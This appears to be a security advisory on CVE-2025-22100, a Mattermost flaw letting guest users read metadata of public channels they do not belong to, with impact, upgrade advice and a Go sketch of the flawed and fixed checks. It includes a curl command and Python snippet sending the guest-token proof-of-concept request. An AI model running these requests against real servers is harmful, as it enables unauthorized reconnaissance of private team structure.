Mattermost, Improper Access Control, CVE-2025-22100 (Medium)

The CVE-2025-22100 vulnerability stems from an authorization flaw within the `/api/v4/teams/{team_id}/channels/ids` API endpoint. In affected versions of Mattermost, the permission check for guest users was incorrectly implemented. When a guest user, who typically has highly restricted visibility, sent a POST request to this endpoint with a list of channel IDs, the system did not properly verify if the user had explicit ‘read’ permissions for those specific public channels. Instead of cross-referencing the guest’s limited team membership against the requested channels, the endpoint would return the metadata for any active public channel within the given team. This allowed guest users to discover and gather information about public channels they were not members of, violating the intended security model and leading to an information disclosure issue.

Platform: Mattermost

Version: 10.5.x <= 10.5.10, 10.11.x <= 10.11.2

Vulnerability: Improper Access Control

Severity: Medium

Date: 2025-01-28

Prediction: 2025-02-11

What Undercode Say:

# Request to the affected endpoint with a guest session token (GUEST_TOKEN, abc123 and the channel IDs are placeholders)
curl -X POST "https://mattermost.example.com/api/v4/teams/abc123/channels/ids" \
  -H "Authorization: Bearer GUEST_TOKEN" \
  -H "Content-Type: application/json" \
  -d '["channel_id_1", "channel_id_2"]'

# The same request scripted in Python (host, token, team ID and channel IDs are placeholders)
import requests

headers = {'Authorization': 'Bearer GUEST_TOKEN'}
data = ['channel_id_1', 'channel_id_2']  # JSON array of channel IDs, as the endpoint expects
response = requests.post('https://mattermost.example.com/api/v4/teams/team_id/channels/ids', json=data, headers=headers)
print(response.json())  # on an unpatched server: metadata for every active public channel in the team among the IDs

How to Exploit:

Guest users exploit the flawed API endpoint by sending a POST request containing a list of channel IDs. The system insecurely returns metadata like channel names, display names, and purposes for public channels the guest should not have access to, enabling unauthorized discovery and reconnaissance of team structure.

Protection from this CVE

Upgrade Mattermost to version 10.5.11, 10.11.3, or a later fixed release. These versions contain the corrected authorization logic that properly validates a guest user’s permissions against each requested channel, ensuring metadata is only returned for channels the user is explicitly authorized to view.
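To make the authorization gap concrete, here is an added example (not Mattermost's code) that models the endpoint's channel lookup twice: once as the advisory describes the flawed behaviour, and once with the per-channel guest check. The types, the membership model and the requirement that a guest be a member of each requested channel are assumptions for illustration, not the project's actual patch.

```go
package main

import "fmt"

type Channel struct { // minimal stand-in for Mattermost channel metadata (hypothetical type)
	ID, TeamID, Name, DisplayName string
	Public                        bool
	DeleteAt                      int64 // non-zero once archived
}

type Caller struct { // the requesting user
	IsGuest     bool
	Memberships map[string]bool // channel IDs the caller is a member of
}

// Flawed lookup as the advisory describes it: every active public channel in the
// team whose ID was requested comes back, with no per-channel check for guests.
func LookupChannelsVulnerable(teamID string, ids []string, store map[string]Channel) []Channel {
	var out []Channel
	for _, id := range ids {
		if ch, ok := store[id]; ok && ch.TeamID == teamID && ch.Public && ch.DeleteAt == 0 {
			out = append(out, ch)
		}
	}
	return out
}

// Hardened lookup: same filtering, but a guest must be a member of each requested
// channel before its metadata is returned (assumed reading of the fix, not Mattermost's code).
func LookupChannelsFixed(teamID string, ids []string, store map[string]Channel, c Caller) []Channel {
	var out []Channel
	for _, ch := range LookupChannelsVulnerable(teamID, ids, store) {
		if !c.IsGuest || c.Memberships[ch.ID] { // non-guests keep normal public-channel visibility
			out = append(out, ch)
		}
	}
	return out
}

// SampleStore is constructed data: two public channels in team t1 and one in t2.
func SampleStore() map[string]Channel {
	return map[string]Channel{
		"c-town":  {ID: "c-town", TeamID: "t1", Name: "town-square", DisplayName: "Town Square", Public: true},
		"c-infra": {ID: "c-infra", TeamID: "t1", Name: "infra", DisplayName: "Infra", Public: true},
		"c-other": {ID: "c-other", TeamID: "t2", Name: "other", DisplayName: "Other", Public: true},
	}
}

func main() {
	guest := Caller{IsGuest: true, Memberships: map[string]bool{"c-town": true}}
	ids := []string{"c-town", "c-infra", "c-other"}
	fmt.Println(len(LookupChannelsVulnerable("t1", ids, SampleStore())), "leaked before fix,", len(LookupChannelsFixed("t1", ids, SampleStore(), guest)), "after")
}
```

A guest who belongs only to town-square gets both t1 channels from the flawed lookup but only town-square from the fixed one; the channel from team t2 is dropped by both.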

Impact:

Information Disclosure. Guest users can map out a team’s public channel structure, gaining insights into internal discussions, projects, and team organization that should remain hidden from their view, potentially aiding further social engineering or targeted attacks.

Sources:

Reported By: github.com